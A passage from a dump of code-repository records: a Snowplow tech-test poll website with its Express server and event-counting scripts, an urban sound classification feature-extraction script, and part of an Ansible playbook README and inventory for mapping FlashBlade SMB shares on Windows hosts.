"text": "# Snowplow Tech Test\n\nThis is a simple website that asks the question \"Skiing or snowboarding?\", and uses snowplow-micro to store the results.\n\n## Setup\n\n- Clone this repo into your chosen directory.\n- Download [snowplow/snowplow-micro](https://hub.docker.com/r/snowplow/snowplow-micro) from Docker-Hub.\n- Run `$ docker run --mount type=bind,source=$(pwd)/example,destination=/config -p 9090:9090 snowplow/snowplow-micro:1.1.2 --collector-config /config/micro.conf --iglu /config/iglu.json` in the repo.\n- Same for `npm install`.\n- Start the node server with `node app.js`\n- Go to http://localhost:8888/\n\n## Method\n\n### Styling\n\nNow I want to start off by appreciating that starting on styling is weird. But I had an image in my head of what I wanted the website to look like, and I didn't know how to tackle snowplow-micro.\n\nI would say that I find myself more comfortable working on typical backend problems, so I wanted to learn a handful of styling methods and implement them into this project. Admittedly, I spent too much time on this, but I learnt a lot, so it was by no means wasted.\n\nTo start off, I chose a background image that:\n\n- Was skiing themed, because, Snowplow.\n- Had a large depth of field, so the parallax effect was more obvious.\n\nOnce I found the image(from [unsplash](https://unsplash.com/photos/2Gs29PjkAA4)), I prepared it in Adobe Photoshop by separating out the layers into the three different images([slope](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/slope.png), [jump](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/jump.png), [bg](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/bg.png)). Then using JS's [Timeline](https://greensock.com/docs/v2/TimelineMax) library, I animated the images so that the images in the foreground moved up the screen, and the background slightly down. This gave the illusion of the camera panning down. Then using JS's [ScrollMagic](https://scrollmagic.io/) library, I made the animation rely on scrolling rather than time.\n\n### Getting snowplow-micro to talk\n\nThis was all brand new to me, so in hindsight I can look back at this and think it's straight forward, but at the time, not so much.\nThere were a few steps to get this running:\n\n- To start off I needed to get Windows Subsystem for Linux set up on my PC, which was definitely more involved than I was expecting.\n- Then installing Docker.\n- Installing snowplow/snowplow-micro from Docker Hub\n- Run the Docker command from snowplow-micro's readme in my project directory\n- Copy across the config files from snowplow-micro - This step took me far longer than I care to admit.\n- Using Snoplow's pretty extensive JS tracking library documentation, I found the script tag to put in the head of my [index](https://github.com/MykeNuLeng/generic-webiste/blob/main/index.html) page, and the trackPageView function to implement with it.\n- Run the Docker container.\n- Load up localhost:9090/micro/all\n I got to admit, when I saw the api returning actual events I was a combination of relieved and excited in about equal measures.\n\n### Tracking the poll results\n\nThe initial goal was to have buttons for the poll, and use onclick functions to trigger an event which could then be accessed from micro. 
I couldn't quite figure out how to implement this custom event, so I went with links as I knew how to implement trackPageView from the setup.\n\nFrom there I made 2 pages([ski](https://github.com/MykeNuLeng/generic-webiste/blob/main/ski.html), [snowboard](https://github.com/MykeNuLeng/generic-webiste/blob/main/snowboard.html)) for each link in the poll, with trackPageView scripts in the head of both. I made a custom title for each of them to make it easier to distinguish the events. Although in hindsight, the JSON from the api includes a url tag, and as I was using separate pages, I could have just relied on that instead of the custom title.\n\nThe async for the tracking script was 1s, so I made it redirect back to the homepage after 2, which does feel quite clunky, another reason why buttons would have been a lot nicer.\n\nNow that the 2 pages were being tracked, I wanted a way to display the results of the poll on the homepage.\n\nSo to start with, I wanted to make a function that searched through the json data, checked each events name_tracker, and added it to the result if it corresponded to what I was looking for.\n\nAs I'm a lot more comfortable coding in Python, I thought it would be a great idea to go ahead and do this, in Python. This was a terrible idea, as I didn't consider how I was going to integrate this function into my node server. Either way, the mistake made me laugh, so I've left the [file](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/json_fetch.py) in the repo.\n\nAfter that I rewrote it in JS in this [file](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/json_fetch.js), and when run on node in my terminal, the functions were returning correctly, so time to move on.\n\nAt this point I wanted to use the functions that I wrote directly in my HTML, so I tried using [EJS](https://ejs.co/), this was a bit fiddly to adjust the file structure, and the node server, but nothing too bad.\n\nHowever, when doing this I kept getting CORS errors, so EJS was scrapped.\n\nThe next idea was to load the api data into a route on the node [server](https://github.com/MykeNuLeng/generic-webiste/blob/main/app.js), and then access the data from there. This seemed to work when going to localhost:8888/api so I stuck with that.\n\nFrom there I wrote an IIFE in the script [file](https://github.com/MykeNuLeng/generic-webiste/blob/main/public/script.js)(that was currently only being used to hold the animation for the website) to access the data from localhost:8888/api and add it to the innerHTML of an element on the homepage.\n\n## Conclusion\n\n### New Technologies\n\n- WSL\n- Docker\n- Snowplow-micro\n- Snowplow JS tracker\n- EJS\n- Timeline\n- ScrollMagic\n- Adobe Photoshop\n\n### Lessons\n\nIn reflection I would say that I didn't spend enough time planning. With better foresight I would have:\n\n- Familiarized myself with snowplow-micro before starting on the project, as I think the everything would have fallen into place a lot quicker afterwards.\n- I could have avoided writing a file in Python, and wasting time trying to come up with ways to integrate it.\n- I could have managed my time a lot better as well.\n\n### Summary\n\n- I'm pretty happy with how it turned out\n- Buttons rather than links would have been so nice\n- The parallax effect is really striking\n"
},
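The README above reads results straight from snowplow-micro's REST endpoints; a small sketch of polling them from Python (the paths are the ones the README itself mentions — `/micro/all` for a summary, `/micro/good` for the good events that `json_fetch.py` below consumes):

```python
import json
import urllib.request

for path in ('all', 'good'):
    with urllib.request.urlopen('http://localhost:9090/micro/' + path) as resp:
        print(path, json.loads(resp.read()))
```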
{
"alpha_fraction": 0.5528846383094788,
"alphanum_fraction": 0.5961538553237915,
"avg_line_length": 28.714284896850586,
"blob_id": "b8d1c4f81e82f322fac38ab263c7a26db6d45c95",
"content_id": "3f1dc80967142cb54009e41930ff25b72f05cc22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1040,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 35,
"path": "/public/script.js",
"repo_name": "MykeNuLeng/generic-webiste",
"src_encoding": "UTF-8",
"text": "let controller = new ScrollMagic.Controller();\nlet timeline = new TimelineMax();\n\n// scrollMagic animation\ntimeline\n .to(\".slope\", 10, { y: -500 })\n .fromTo(\".jump\", { y: -50 }, { y: -300, duration: 10 }, \"-=10\")\n .fromTo(\".bg\", { y: -20 }, { y: 0, duration: 10 }, \"-=10\")\n .to(\".content\", 10, { top: \"0%\" }, \"-=10\")\n .fromTo(\".text\", { opacity: 0 }, { opacity: 1, duration: 3 })\n .fromTo(\".score\", { opacity: 0 }, { opacity: 1, duration: 3 }, \"-=3\")\n .fromTo(\n \".content-buttons\",\n { opacity: 0 },\n { opacity: 1, duration: 3 },\n \"-=3\"\n );\n\nlet scene = new ScrollMagic.Scene({\n triggerElement: \"section\",\n duration: \"200%\",\n triggerHook: 0\n})\n .setTween(timeline)\n .setPin(\"section\")\n .addTo(controller);\n\n//loading results from api to innerHTML of poll results in index.html\n(async function () {\n const response = await fetch(\"http://localhost:8888/api\");\n const score = await response.json();\n document.querySelector(\n \".score\"\n ).innerHTML = `Poll results ${score.skiing} : ${score.snowboarding}`;\n})();\n"
},
{
"alpha_fraction": 0.6637837886810303,
"alphanum_fraction": 0.6702702641487122,
"avg_line_length": 26.205883026123047,
"blob_id": "3e78542ca51b5e45567679618eb246fe871f3b02",
"content_id": "48d7987a016f9dd3986426222f7661e014f8c38c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 925,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 34,
"path": "/app.js",
"repo_name": "MykeNuLeng/generic-webiste",
"src_encoding": "UTF-8",
"text": "const express = require(\"express\");\nconst path = require(\"path\");\nconst jsonFetch = require(\"./public/json_fetch\");\n\nconst app = express();\nconst port = process.env.PORT || 8888;\n\n//setting middleware\napp.use(express.static(__dirname + \"/public\")); //Serves resources from public folder\n\n//homepage\napp.get(\"/\", function (req, res) {\n res.sendFile(path.join(__dirname, \"/index.html\"));\n});\n\n//calling api from snowplow-micro\napp.get(\"/api\", function (req, res) {\n jsonFetch.getScore().then((score) => {\n res.json(score);\n });\n});\n\n//ski poll answer page, redirects to home page after 2s\napp.get(\"/ski\", function (req, res) {\n res.sendFile(path.join(__dirname, \"/ski.html\"));\n});\n\n//snowboard poll page, redirects to home page after 2s\napp.get(\"/snowboard\", function (req, res) {\n res.sendFile(path.join(__dirname, \"/snowboard.html\"));\n});\n\napp.listen(port);\nconsole.log(\"Server started at http://localhost:\" + port);\n"
},
{
"alpha_fraction": 0.6197410821914673,
"alphanum_fraction": 0.6262136101722717,
"avg_line_length": 25.869565963745117,
"blob_id": "f1af5ddf7213ec50dd1191538e824e49c3c2460c",
"content_id": "f0f510cf79fb8a1d033d1308c194166e40391195",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 618,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 23,
"path": "/public/json_fetch.py",
"repo_name": "MykeNuLeng/generic-webiste",
"src_encoding": "UTF-8",
"text": "import urllib.request\nimport json\n\n\ndef return_json():\n url = \"http://localhost:9090/micro/good\"\n response = urllib.request.urlopen(url)\n data = json.loads(response.read())\n return data\n\n\ndef snowboard_count():\n data = return_json()\n snowboard_events = [raw_event for raw_event in data if raw_event[\"event\"]\n [\"name_tracker\"] == \"SnowboardTracker\"]\n return len(snowboard_events)\n\n\ndef ski_count():\n data = return_json()\n ski_events = [raw_event for raw_event in data if raw_event[\"event\"]\n [\"name_tracker\"] == \"SkiTracker\"]\n return len(ski_events)\n"
},
{
"alpha_fraction": 0.5837838053703308,
"alphanum_fraction": 0.5935134887695312,
"avg_line_length": 22.125,
"blob_id": "98f65d6de85403763ae3424aab51dfe7ccbfc530",
"content_id": "6b0a867ee4a066dff696e912ab6116e34d8d8e50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 925,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 40,
"path": "/public/json_fetch.js",
"repo_name": "MykeNuLeng/generic-webiste",
"src_encoding": "UTF-8",
"text": "const fetch = require(\"node-fetch\");\nconst jsonFetch = {\n getEvents: async function () {\n const response = await fetch(\"http://localhost:9090/micro/good\");\n const events = await response.json();\n\n return events;\n },\n\n snowboardCount: async function () {\n const events = await this.getEvents();\n let total = 0;\n events.forEach((element) => {\n if (element.event.name_tracker === \"SnowboardTracker\") total += 1;\n });\n return total;\n },\n\n skiCount: async function () {\n const events = await this.getEvents();\n let total = 0;\n for (i = 0; i < events.length; i++) {\n if (events[i].event.name_tracker === \"SkiTracker\") {\n total += 1;\n }\n }\n return total;\n },\n\n getScore: async function () {\n snowboarding = await this.snowboardCount();\n skiing = await this.skiCount();\n return {\n snowboarding,\n skiing\n };\n }\n};\n\nmodule.exports = jsonFetch;\n"
}
] | 5 |
josjsjen/Urban-Sound-Classification | https://github.com/josjsjen/Urban-Sound-Classification | 29887e8d5bb75e29da7aabb8615c6e89071d342d | 8bef11709613eaf573748f4eabbaaeda10952ab0 | ee204a61edbb2b4ba1a5d8a62740b2a8cdfa20d1 | refs/heads/master | 2020-03-16T17:42:01.885015 | 2018-05-10T14:15:17 | 2018-05-10T14:15:17 | 132,841,956 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5845410823822021,
"alphanum_fraction": 0.6006441116333008,
"avg_line_length": 34.056602478027344,
"blob_id": "06cfcfe2ca0a556ea37dd30abd14388855ce0501",
"content_id": "b08df0b3f4ba298566b27d55a47ae6bc18a452d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1863,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 53,
"path": "/CNN_urban.py",
"repo_name": "josjsjen/Urban-Sound-Classification",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 8 19:52:34 2018\n\n@author: jie\n\"\"\"\n\nimport glob\nimport os\nimport librosa\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\n\nplt.style.use('ggplot')\n\ndef windows(data, window_size):\n start = 0\n while start < len(data):\n yield start, start + window_size\n start += (window_size / 2)\n\ndef extract_features(parent_dir,sub_dirs,file_ext=\"*.wav\",bands = 60, frames = 41):\n window_size = 512 * (frames - 1)\n log_specgrams = []\n labels = []\n for l, sub_dir in enumerate(sub_dirs):\n for fn in glob.glob(os.path.join(parent_dir, sub_dir, file_ext)):\n sound_clip,s = librosa.load(fn)\n label = fn.split('/')[2].split('-')[1]\n for (start,end) in windows(sound_clip,window_size):\n if(len(sound_clip[start:end]) == window_size):\n signal = sound_clip[start:end]\n melspec = librosa.feature.melspectrogram(signal, n_mels = bands)\n logspec = librosa.logamplitude(melspec)\n logspec = logspec.T.flatten()[:, np.newaxis].T\n log_specgrams.append(logspec)\n labels.append(label)\n \n log_specgrams = np.asarray(log_specgrams).reshape(len(log_specgrams),bands,frames,1)\n features = np.concatenate((log_specgrams, np.zeros(np.shape(log_specgrams))), axis = 3)\n for i in range(len(features)):\n features[i, :, :, 1] = librosa.feature.delta(features[i, :, :, 0])\n \n return np.array(features), np.array(labels,dtype = np.int)\n\ndef one_hot_encode(labels):\n n_labels = len(labels)\n n_unique_labels = len(np.unique(labels))\n one_hot_encode = np.zeros((n_labels,n_unique_labels))\n one_hot_encode[np.arange(n_labels), labels] = 1\n return one_hot_encode\n \n"
},
{
"alpha_fraction": 0.8013029098510742,
"alphanum_fraction": 0.8013029098510742,
"avg_line_length": 101,
"blob_id": "b3b98cd1ab0baf41f7c14c8891aac4c29e5881d3",
"content_id": "a8f75411b548c82b52d391dda2e70b7726d52e71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 311,
"license_type": "no_license",
"max_line_length": 274,
"num_lines": 3,
"path": "/README.md",
"repo_name": "josjsjen/Urban-Sound-Classification",
"src_encoding": "UTF-8",
"text": "# Urban Sound Classification \n\nThe goal of this project is to create a “good” model to predict the urban sound. This series of Jupyter (IPython) notebooks provides a quick way to start analyzing this dataset. It gives an overview of the underlying data, shows some baseline machine classification results.\n\n"
}
] | 2 |
atembamanu/Machine-Learning-Titanic-Survivers-Logistic-Regression | https://github.com/atembamanu/Machine-Learning-Titanic-Survivers-Logistic-Regression | 7c3441786710f15fd1a6e44853d16da0cf5e88cb | 4bef4aecfe795a4aea701cbeb5ae0aaf7cb3fef5 | 00c2db86fcd2e3c10d80df38b7364600fea5a765 | refs/heads/master | 2022-05-21T13:38:06.707139 | 2020-04-30T06:58:40 | 2020-04-30T06:58:40 | 260,136,454 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6043218970298767,
"alphanum_fraction": 0.6507700085639954,
"avg_line_length": 10.297752380371094,
"blob_id": "1925e55c4c7885094af1bbecedfa6fdbfbc52029",
"content_id": "4ace8bbcc450df8ed1d1b101cfe7505d04daa7ea",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4026,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 356,
"path": "/Titanic_Logistic_Regression.py",
"repo_name": "atembamanu/Machine-Learning-Titanic-Survivers-Logistic-Regression",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[95]:\n\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport math\n\n\n# ## Step 1: collecting data\n\n# In[96]:\n\n\n#Reading data\n\ntitanic_data = pd.read_csv('titanic_train_clean.csv')\ntitanic_data.head(10)\n\n\n# In[97]:\n\n\n#Get the total number of passengers \ntitanic_data.shape\n\n\n# ## Step 2 Analyzing Data\n\n# In[98]:\n\n\n#survived vs not survived\nsns.countplot(x = 'Survived', data = titanic_data)\n\n\n# In[99]:\n\n\n#how many males and females\nsns.countplot(x = 'Survived', hue='Sex', data=titanic_data)\n\n\n# In[100]:\n\n\n#ticket class of the passengers\nsns.countplot(x='Survived', hue='Pclass', data=titanic_data)\n\n\n# In[101]:\n\n\n#Age distribution\ntitanic_data['Age'].plot.hist()\n\n\n# In[102]:\n\n\n#Fare Distribution\ntitanic_data['Fare'].plot.hist()\n\n\n# In[103]:\n\n\n#get info on columns \ntitanic_data.info()\n\n\n# In[104]:\n\n\nsns.countplot(x='SibSp', data=titanic_data)\n\n\n# In[105]:\n\n\nsns.countplot(x='Parch', data=titanic_data)\n\n\n# ## Step 3 Data Wrangling\n\n# In[106]:\n\n\n#cleaning the data, removing all null values\n\n#check for null values\ntitanic_data.isnull()\n\n\n# In[107]:\n\n\n#show all null values in the dataset\ntitanic_data.isnull().sum()\n\n\n# In[108]:\n\n\n#display in heatmap\nsns.heatmap(titanic_data.isnull(), cmap=\"viridis\")\n\n\n# In[109]:\n\n\n#if age had null\n#plot boxplot for visualization\n\nsns.boxplot(x='Pclass', y='Age', data=titanic_data)\n\n#imputation\ndef impute_age(cols):\n Age =cols[0]\n Pclass = cols[6]\n if(pd.isnull(Age)):\n if(Pclass == 1):\n return 37\n elif(Pclass == 2):\n return 29\n else:\n return 24\n else:\n return Age\n \n \ntitanic_data['Age'] = titanic_data[['Age', 'Pclass'].apply(impute_age, axis = 1)]\n\n\n# In[110]:\n\n\ntitanic_data.head(5)\n\n\n# In[111]:\n\n\n#Cabin column has too many null values, lets drop it\ntitanic_data.drop('Cabin', axis=1, inplace=True)\n\n\n# In[112]:\n\n\nsns.heatmap(titanic_data.isnull(), cmap=\"viridis\")\n\n\n# In[113]:\n\n\n#drop all na values\ntitanic_data.dropna(inplace=True)\n\n\n# In[114]:\n\n\n#check if the dataset is clean\ntitanic_data.isnull().sum()\n\n\n# In[115]:\n\n\n#set gender to be binary\nsex = pd.get_dummies(titanic_data['Sex'], drop_first = True)\n\n\n# In[116]:\n\n\n#apply get_dummies to embarked\nembark = pd.get_dummies(titanic_data['Embarked'], drop_first=True)\nembark.head(5)\n\n\n# In[117]:\n\n\npcl = pd.get_dummies(titanic_data['Pclass'], drop_first=True)\npcl.head(5)\n\n\n# In[118]:\n\n\ntitle = pd.get_dummies(titanic_data['Title'])\ntitle.head(5)\n\n\n# In[119]:\n\n\n#merge the data\ntitanic_data= pd.concat([titanic_data, sex, embark, pcl], axis= 1)\ntitanic_data.head(5)\n\n\n# In[120]:\n\n\n\ntitanic_data.head(5)\n\n\n# In[121]:\n\n\ntitanic_data.head(5)\n\n\n# In[122]:\n\n\ntitanic_data.drop(['Name', 'Ticket', 'PassengerId'], axis=1, inplace=True)\n\n\n# In[123]:\n\n\ntitanic_data.head(5)\n\n\n# In[124]:\n\n\ntitanic_data.drop('Title', axis=1, inplace=True)\n\n\n# In[125]:\n\n\ntitanic_data.head(5)\n\n\n# In[126]:\n\n\ntitanic_data.drop(['Embarked', 'Pclass', 'Sex'], axis=1, inplace=True)\n\n\n# In[127]:\n\n\ntitanic_data.head(5)\n\n\n# ## Train and Test\n\n# In[128]:\n\n\ny = titanic_data['Survived']\n\n\n# In[129]:\n\n\nX = titanic_data.drop('Survived', axis=1)\n\n\n# In[130]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[131]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, 
random_state=1)\n\n\n# In[132]:\n\n\nfrom sklearn.linear_model import LogisticRegression\n\n\n# In[133]:\n\n\nlogmodel = LogisticRegression()\n\n\n# In[135]:\n\n\nlogmodel.max_iter = 120000\n\n\n# In[136]:\n\n\nlogmodel.fit(X_train, y_train)\n\n\n# In[137]:\n\n\npredictions = logmodel.predict(X_test)\n\n\n# In[139]:\n\n\nfrom sklearn.metrics import classification_report\n\n\n# In[140]:\n\n\nclassification_report(y_test, predictions)\n\n\n# In[141]:\n\n\nfrom sklearn.metrics import confusion_matrix\n\n\n# In[142]:\n\n\nconfusion_matrix(y_test, predictions)\n\n\n# In[144]:\n\n\nfrom sklearn.metrics import accuracy_score\n\n\n# In[145]:\n\n\naccuracy_score(y_test, predictions)\n\n\n# In[146]:\n\n\naccuracy_score(y_test, predictions) * 100\n\n\n# In[ ]:\n\n\n\n\n"
}
] | 1 |
tomjuran/Library | https://github.com/tomjuran/Library | bccb86aa5f0752eaba57c8e8adc4be2e27f25dae | aecc0617650fbbf7fb9d851497efd00748279060 | 2bf21059934ff2cb6c5daef923e49852f2b95f76 | refs/heads/main | 2023-03-06T04:27:42.088705 | 2021-02-16T17:58:37 | 2021-02-16T17:58:37 | 339,483,343 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7107142806053162,
"alphanum_fraction": 0.7107142806053162,
"avg_line_length": 29.33333396911621,
"blob_id": "153f88f79263795f5bc582f63b69ff12f3543a9d",
"content_id": "45b04214d439ad62a418ef22806762dfaeaa9bc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 280,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 9,
"path": "/urls.py",
"repo_name": "tomjuran/Library",
"src_encoding": "UTF-8",
"text": "# books-api/booksApi/books/urls.py.\r\nfrom django.urls import path\r\nfrom rest_framework.urlpatterns import format_suffix_patterns\r\nfrom books import views\r\n\r\nurlpatterns = [\r\n path('books/', views.BookList.as_view()),\r\n path('books/<int:pk>/', views.BookDetail.as_view()),\r\n]"
},
{
"alpha_fraction": 0.5815109610557556,
"alphanum_fraction": 0.5874751210212708,
"avg_line_length": 23.200000762939453,
"blob_id": "1025a7f8fabb2ce9f50a1cc5f26ff14891a17232",
"content_id": "f8a262ced4bb7d2730d80c05070d24ab3f1d1cd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1006,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 40,
"path": "/src/components/ToggleBookForm.js",
"repo_name": "tomjuran/Library",
"src_encoding": "UTF-8",
"text": "import React, {Component} from 'react'\r\nimport BookForm from './BookForm'\r\n\r\nclass ToggleableBookForm extends Component {\r\n state = {\r\n inCreateMode: false\r\n }\r\n handleCreateClick = () => {\r\n this.setState({inCreateMode: true});\r\n }\r\n leaveCreateMode = () => {\r\n this.setState({inCreateMode: false});\r\n }\r\n handleCancleClick = () => {\r\n this.leaveCreateMode();\r\n }\r\n handleFormSubmit = (book) => {\r\n this.leaveCreateMode();\r\n this.props.onBookCreate(book);\r\n }\r\n render() {\r\n if (this.state.inCreateMode) {\r\n return (\r\n <div className=\"mb-3 p-4\" style={{boxShadow: '0 0 10px #ccc'}} >\r\n <BookForm\r\n onFormSubmit={this.handleFormSubmit}\r\n onCancelClick={this.handleCancleClick}></BookForm>\r\n </div>\r\n\r\n )\r\n }\r\n return (\r\n <button onClick={this.handleCreateClick} className=\"btn btn-secondary\">\r\n <i className=\"fas fa-plus\">Click</i>\r\n </button>\r\n );\r\n }\r\n}\r\n\r\nexport default ToggleableBookForm"
},
{
"alpha_fraction": 0.7682619690895081,
"alphanum_fraction": 0.7682619690895081,
"avg_line_length": 28.69230842590332,
"blob_id": "b2a0bfb7b20585cdba3cee5c71d942387ed0faa1",
"content_id": "7506e302d029fa983fbb87fcdccf9162f944c318",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 13,
"path": "/views.py",
"repo_name": "tomjuran/Library",
"src_encoding": "UTF-8",
"text": "# books-api/booksApi/books/views.py.\r\n\r\nfrom .models import Book\r\nfrom .serializers import BookSerializer\r\nfrom rest_framework import generics\r\n\r\nclass BookList(generics.ListCreateAPIView):\r\n queryset = Book.objects.all()\r\n serializer_class = BookSerializer\r\n\r\nclass BookDetail(generics.RetrieveUpdateDestroyAPIView):\r\n queryset = Book.objects.all()\r\n serializer_class = BookSerializer"
}
] | 3 |
keshavattrey/ansible-playbook-examples | https://github.com/keshavattrey/ansible-playbook-examples | 42a2cbabb7fde56429e245fee3ae8e4a45e3a2ca | 2eaa5e563c4e86a300ebf4ea83967b243289f03d | f07dd9a9734a072bfc9c89c766dc66ec154e7bae | refs/heads/master | 2022-12-18T20:45:26.406412 | 2020-09-22T11:17:11 | 2020-09-22T11:17:11 | 297,573,029 | 1 | 0 | Apache-2.0 | 2020-09-22T07:41:18 | 2020-09-20T21:05:56 | 2020-09-20T21:05:53 | null | [
{
"alpha_fraction": 0.6448656320571899,
"alphanum_fraction": 0.651739239692688,
"avg_line_length": 33.5467643737793,
"blob_id": "67f7e710dcad7f785fefc1aecd3fae85c3e4a011",
"content_id": "caabfc73090a0f53a18e6424911b8d5d89e173e4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4803,
"license_type": "permissive",
"max_line_length": 383,
"num_lines": 139,
"path": "/flashblade/pure-fb-smb-filesystem-map/README.md",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "FlashBlade SMB FileSystem mapping on Windows clients \n=========\n\nAnsible playbook and role for FlashBlade SMB File System mapping on Windows clients.\n\n\nRequirements\n------------\n**Requires: Python >=2.7, <=3.6 on Ansible control node.**\n\nAs purity-fb SDK supports Python >=2.7, <=3.6, We need to ensure that Installed Python version on Ansible control Node must be >=2.7 and <=3.6.\n\n* Install python-pip on Ansible control node.\n\n CentOS:\n ```bash\n $ sudo yum install epel-release\n $ sudo yum install python-pip\n $ sudo pip install --upgrade pip\n ```\n Ubuntu:\n ```bash\n $ sudo apt install python-pip\n $ sudo pip install --upgrade pip\n ```\n MacOS\n ```bash\n $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py\n $ python get-pip.py --user\n ```\n For more details to install Ansible on MacOS, follow this [link](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html#installing-ansible-with-pip).\n \n* Install dependencies from \"requirements.txt\"\n ```bash\n $ sudo pip install -r requirements.txt \n ```\n* Install Ansible Collection for Pure Storage FlashBlade\n ```bash\n $ ansible-galaxy collection install purestorage.flashblade\n ```\n\nWindows host setup\n------------------\n\nTo setup windows host for Ansible, refer to the Ansible [documentation](https://docs.ansible.com/ansible/latest/user_guide/windows_setup.html).\n\nFor this playbook we assumes that the `CredSSP` authentication protocol enabled on host/client. \n\nRole Variables\n--------------\n\nThere are two variable files \"fb_details.yml\" and \"fb_secrets.yml\" are holding the Ansible variables for the role at path `vars/<enviorement_name>`. \n\nThis role and playbook can be used to setup SMB File System on FlashBlade servers and mount on clients in different environments. To store role variable files user can create different directories with `vars/<environment_name>`. User must specify `<environment_name>` while running `ansible-playbook` by specifying value in extra vars command line flag `-e \"env=<environment_name>\"`.\n\nAnsible playbooks require API token to connect to FlashBlade servers. API token can be obtained by connecting FlashBlade management VIP through ssh for a specific user and running the following purity command.\n ```\n $ ssh <pureuser>@<pure_fb_mgmt_ip>\n $ pureadmin list <username> --api-token -–expose\n ```\nUpdate \"api_token\" obtained from FlashBlade in \"fb_secrets.yml\" file and \"fb_url\" value with FlashBlade Management VIP in \"fb_details.yml\" \n\nEncrypt \"fb_secrets.yml\" using Ansible-Vault and enter password when prompted. 
This password is required to run playbook.\n```\n$ ansible-vault encrypt fb_secrets.yml\n```\n\nUpdate variables in `fb_details.yml` and `fb_secrets.yml` files to the desired values.\n\n* fb_details.yml\n ```\n ############################ FB array object-store provisioning #############################\n array_inventory: \n FBServer1:\n fb_url: 10.222.22.60 \n filesystem:\n - { name: winbackup, size: 32G, type: smb, smb_aclmode: native } \n\n ######################## Mount/Unmount Filesystem on client/host ########################\n windows_client_mount:\n mount1:\n server: { fb_name: FBServer1, fileshare: winbackup, data_vip: NFS-1 } \n client: { hosts: win, mount_state: mapped, drive_letter: Z } \n ```\n Note: To unmap the fileshare, use `mount_state: unmapped` in \"fb_details.yml\" file.\n\n* fb_secrets.yml\n ```\n array_secrets: \n FBServer1:\n token: T-154d4220-xxxx-xxxx-8d64-fe7ea4f93499\n ```\n* hosts.ini \n ```\n [win]\n windows-host1 ansible_host=10.xx.xxx.96\n\n [win:vars]\n ansible_user=<DOMAIN>\\<user_name>\n ansible_connection=winrm\n ansible_winrm_transport=credssp\n ansible_winrm_server_cert_validation=ignore\n ```\n\n\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n - name: FlashBlade filesystem setup\n hosts: localhost\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_filesystem_setup\n\n - name: Mount SMB file share on windows hosts\n hosts: win\n gather_facts: false\n vars_files:\n - \"vars/{{ env }}/fb_details.yml\"\n - \"vars/{{ env }}/fb_secrets.yml\"\n roles:\n - purefb_smb_map\n\n\nTo execute playbook, issue the following command:\n( Replace `<enviorement_name>` and `<client_pass> `with the correct value )\n ```bash\n $ ansible-playbook filesystem_smb_map.yml -e \"env=<enviorement_name> ansible_password=<client_pass>\" --ask-vault-pass\n ```\nEnter Ansible-Vault password when prompted.\n\n**Note:** To see the mapped drive on interactive session, user need to reboot the system."
},
{
"alpha_fraction": 0.7828282713890076,
"alphanum_fraction": 0.8333333134651184,
"avg_line_length": 23.75,
"blob_id": "37a8082081246adee2044723dba1f174d2f6db09",
"content_id": "13ea0aa72d31af3f4b38ec1867aad796ac1f7dc7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 198,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 8,
"path": "/flashblade/pure-fb-smb-filesystem-map/hosts.ini",
"repo_name": "keshavattrey/ansible-playbook-examples",
"src_encoding": "UTF-8",
"text": "[win]\nwindows-host1 ansible_host=10.21.152.96\n\n[win:vars]\nansible_user=PUREANSIBLE\\Administrator\nansible_connection=winrm\nansible_winrm_transport=credssp\nansible_winrm_server_cert_validation=ignore\n"
},
{
"alpha_fraction": 0.6811594367027283,
"alphanum_fraction": 0.7681159377098083,
"avg_line_length": 10.666666984558105,
